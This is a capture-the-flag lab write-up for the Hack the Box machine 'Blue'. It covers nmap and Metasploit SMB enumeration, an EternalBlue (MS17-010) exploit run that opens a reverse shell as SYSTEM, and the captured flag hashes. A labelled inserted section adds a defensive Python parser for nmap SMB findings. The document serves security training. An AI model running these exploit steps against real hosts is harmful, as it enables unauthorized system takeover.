Blue
Introduction
The name of the server is Blue and it’s my second machine in the line of Hack the Box challenges.
This write-up is not public because of the restrictions given by the HTB team.
As for the machine, the level is easy.
Enumeration
Starting with a portscan.
Starting Nmap 7.60 ( https://nmap.org ) at 2017-09-25 10:31 CEST
Nmap scan report for 10.10.10.40
Host is up (0.042s latency).
Not shown: 65526 closed ports
PORT      STATE SERVICE      VERSION
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49156/tcp open  msrpc        Microsoft Windows RPC
49157/tcp open  msrpc        Microsoft Windows RPC
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.60%E=4%D=9/25%OT=135%CT=1%CU=30145%PV=Y%DS=2%DC=T%G=Y%TM=59C8BF
OS:C1%P=x86_64-pc-linux-gnu)SEQ(SP=101%GCD=1%ISR=10B%TI=I%CI=I%TS=7)SEQ(SP=
OS:101%GCD=1%ISR=10B%TI=I%TS=7)OPS(O1=M54DNW8ST11%O2=M54DNW8ST11%O3=M54DNW8
OS:NNT11%O4=M54DNW8ST11%O5=M54DNW8ST11%O6=M54DST11)WIN(W1=2000%W2=2000%W3=2
OS:000%W4=2000%W5=2000%W6=2000)ECN(R=Y%DF=Y%T=80%W=2000%O=M54DNW8NNS%CC=N%Q
OS:=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=
OS:AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T
OS:=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=
OS:0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=
OS:Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=
OS:G%RUCK=G%RUD=G)IE(R=N)

Network Distance: 2 hops
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -1h00m00s, deviation: 0s, median: -1h00m00s
| smb-os-discovery:
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: haris-PC
|   NetBIOS computer name: HARIS-PC\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2017-09-25T08:35:07+01:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2017-09-25 09:35:08
|_  start_date: 2017-09-25 09:12:14

TRACEROUTE (using proto 1/icmp)
HOP RTT       ADDRESS
1   25.85 ms  10.10.14.1
2   114.70 ms 10.10.10.40

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 196.26 seconds
msf auxiliary(pipe_auditor) > run

[*] 10.10.10.40:445 - Pipes: \netlogon, \lsarpc, \samr, \browser, \atsvc, \epmapper, \eventlog, \InitShutdown, \keysvc, \lsass, \LSM_API_service, \ntsvcs, \plugplay, \protected_storage, \scerpc, \srvsvc, \trkwks, \W32TIME_ALT, \wkssvc
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(pipe_dcerpc_auditor) > run

Login Failed: The server refused our NetBIOS session request
UUID 00000131-0000-0000-c000-000000000046 0.0 OPEN VIA BROWSER
UUID 00000134-0000-0000-c000-000000000046 0.0 OPEN VIA BROWSER
UUID 00000143-0000-0000-c000-000000000046 0.0 OPEN VIA BROWSER
UUID 0a74ef1c-41a4-4e06-83ae-dc74fb1cdd53 1.0 OPEN VIA BROWSER
UUID 18f70770-8e64-11cf-9af1-0020af6e72f4 0.0 OPEN VIA BROWSER
UUID 1ff70682-0a51-30e8-076d-740be8cee98b 1.0 OPEN VIA BROWSER
UUID 2eb08e3e-639f-4fba-97b1-14f878961076 1.0 OPEN VIA BROWSER
UUID 326731e3-c1c0-4a69-ae20-7d9044a4ea5c 1.0 OPEN VIA BROWSER
UUID 378e52b0-c0a9-11cf-822d-00aa0051e40f 1.0 OPEN VIA BROWSER
UUID 4b324fc8-1670-01d3-1278-5a47bf6ee188 3.0 OPEN VIA BROWSER
UUID 63fbe424-2029-11d1-8db8-00aa004abd5e 1.0 OPEN VIA BROWSER
UUID 6bffd098-a112-3610-9833-012892020162 0.0 OPEN VIA BROWSER
UUID 86d35949-83c9-4044-b424-db363231fd0c 1.0 OPEN VIA BROWSER
UUID a398e520-d59a-4bdd-aa7a-3c1e0303a511 1.0 OPEN VIA BROWSER
UUID afa8bd80-7d8a-11c9-bef4-08002b102989 1.0 OPEN VIA BROWSER
UUID c9ac6db5-82b7-4e55-ae8a-e464ed7b4277 1.0 OPEN VIA BROWSER
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(smb_enumusers) > run

[+] 10.10.10.40:445 - HARIS-PC [ ]
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(smb_enumshares) > run

[-] 10.10.10.40:139 - Login Failed: The SMB server did not reply to our request
[*] 10.10.10.40:445 - Windows 7 Service Pack 1 (Unknown)
[+] 10.10.10.40:445 - ADMIN$ - (DS) Remote Admin
[+] 10.10.10.40:445 - C$ - (DS) Default share
[+] 10.10.10.40:445 - IPC$ - (I) Remote IPC
[+] 10.10.10.40:445 - Share - (DS)
[+] 10.10.10.40:445 - Users - (DS)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(smb_login) > run

[*] 10.10.10.40:445 - 10.10.10.40:445 - Starting SMB login bruteforce
[-] 10.10.10.40:445 - This system accepts authentication with any credentials, brute force is ineffective.
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(smb_lookupsid) > run

[*] 10.10.10.40:445 - PIPE(LSARPC) LOCAL(haris-PC - 5-21-319597671-3711062392-2889596693) DOMAIN(WORKGROUP - )
[*] 10.10.10.40:445 - USER=Administrator RID=500
[*] 10.10.10.40:445 - USER=Guest RID=501
[*] 10.10.10.40:445 - GROUP=None RID=513
[*] 10.10.10.40:445 - USER=haris RID=1000
[*] 10.10.10.40:445 - HARIS-PC [Administrator, Guest, haris ]
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Starting Nmap 7.60 ( https://nmap.org ) at 2017-09-25 11:50 CEST
Nmap scan report for 10.10.10.40
Host is up (0.028s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|
|     Disclosure date: 2017-03-14
|     References:
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_      https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/

Nmap done: 1 IP address (1 host up) scanned in 2.15 seconds
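The two scans above carry the findings a defender would act on: `smb-security-mode` reports message signing disabled, and `smb-vuln-ms17-010` reports the host unpatched. Added here as a triage example (not part of the original write-up): a small parser for nmap's normal output that extracts both results per host and lists the hosts that still need the MS17-010 patch or SMB signing enforced. The sample input is constructed from the scan lines above, and the regexes assume nmap's normal output layout.

```python
import re

# Constructed sample input: the host-script lines from the two scans above,
# trimmed to what the triage needs (this is not a live scan).
SAMPLE_SCAN = """\
Nmap scan report for 10.10.10.40
Host is up (0.028s latency).
Host script results:
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
"""

HOST_RE = re.compile(r"^Nmap scan report for (\S+)", re.M)
SIGNING_RE = re.compile(r"message_signing:\s*(\w+)")
MS17_RE = re.compile(r"smb-vuln-ms17-010:.*?State:\s*(\w+)", re.S)


def triage_smb(scan_text):
    """Per host: is SMB signing enforced, and what does the ms17-010 NSE
    script report? Assumes nmap's normal (-oN style) output format."""
    findings = {}
    # Slice the report into one chunk per 'Nmap scan report for' header.
    starts = [m.start() for m in HOST_RE.finditer(scan_text)]
    for begin, end in zip(starts, starts[1:] + [len(scan_text)]):
        chunk = scan_text[begin:end]
        host = HOST_RE.match(chunk).group(1)
        signing = SIGNING_RE.search(chunk)
        ms17 = MS17_RE.search(chunk)
        findings[host] = {
            # Only 'required' enforces signing; 'supported' and 'disabled'
            # both leave SMB traffic open to relay and tampering.
            "signing_enforced": bool(signing and signing.group(1) == "required"),
            "ms17_010": ms17.group(1) if ms17 else "no result",
        }
    return findings


def needs_action(findings):
    """Hosts that need the MS17-010 patch or SMB signing enforced."""
    return sorted(host for host, f in findings.items()
                  if f["ms17_010"] == "VULNERABLE" or not f["signing_enforced"])


if __name__ == "__main__":
    for host in needs_action(triage_smb(SAMPLE_SCAN)):
        print(host, triage_smb(SAMPLE_SCAN)[host])
```

Feed it the saved output of `nmap -p445 --script smb-security-mode,smb-vuln-ms17-010 -oN scan.txt <range>` to get the same report for a whole network.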
Exploitation
Enough information gathering. Looks like the system is vulnerable.
msf exploit(ms17_010_eternalblue) > exploit -j
[*] Exploit running as background job 3.

[*] Started reverse TCP handler on 10.10.14.3:4444
[*] 10.10.10.40:445 - Connecting to target for exploitation.
msf exploit(ms17_010_eternalblue) > [+] 10.10.10.40:445 - Connection established for exploitation.
[+] 10.10.10.40:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.10.40:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.10.40:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
[*] 10.10.10.40:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
[*] 10.10.10.40:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1
[+] 10.10.10.40:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.10.40:445 - Trying exploit with 12 Groom Allocations.
[*] 10.10.10.40:445 - Sending all but last fragment of exploit packet
[*] 10.10.10.40:445 - Starting non-paged pool grooming
[+] 10.10.10.40:445 - Sending SMBv2 buffers
[+] 10.10.10.40:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.10.40:445 - Sending final SMBv2 buffers.
[*] 10.10.10.40:445 - Sending last fragment of exploit packet!
[*] 10.10.10.40:445 - Receiving response from exploit packet
[+] 10.10.10.40:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.10.40:445 - Sending egg to corrupted connection.
[*] 10.10.10.40:445 - Triggering free of corrupted buffer.
[-] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] 10.10.10.40:445 - Connecting to target for exploitation.
[+] 10.10.10.40:445 - Connection established for exploitation.
[+] 10.10.10.40:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.10.40:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.10.40:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
[*] 10.10.10.40:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
[*] 10.10.10.40:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1
[+] 10.10.10.40:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.10.40:445 - Trying exploit with 17 Groom Allocations.
[*] 10.10.10.40:445 - Sending all but last fragment of exploit packet
[*] 10.10.10.40:445 - Starting non-paged pool grooming
[+] 10.10.10.40:445 - Sending SMBv2 buffers
[+] 10.10.10.40:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.10.40:445 - Sending final SMBv2 buffers.
[*] 10.10.10.40:445 - Sending last fragment of exploit packet!
[*] 10.10.10.40:445 - Receiving response from exploit packet
[+] 10.10.10.40:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.10.40:445 - Sending egg to corrupted connection.
[*] 10.10.10.40:445 - Triggering free of corrupted buffer.
[*] Command shell session 1 opened (10.10.14.3:4444 -> 10.10.10.40:49158) at 2017-09-25 11:55:18 +0200
[+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system
C:\Users\haris\Desktop>type user.txt.txt
type user.txt.txt
4c546aea7dbee75cbd71de245c8deea9
That’s one. Now to get the final hash.
C:\Users\Administrator\Desktop>type root.txt.txt
type root.txt.txt
ff548eb71e920ff6c08843ce9df4e717
Done.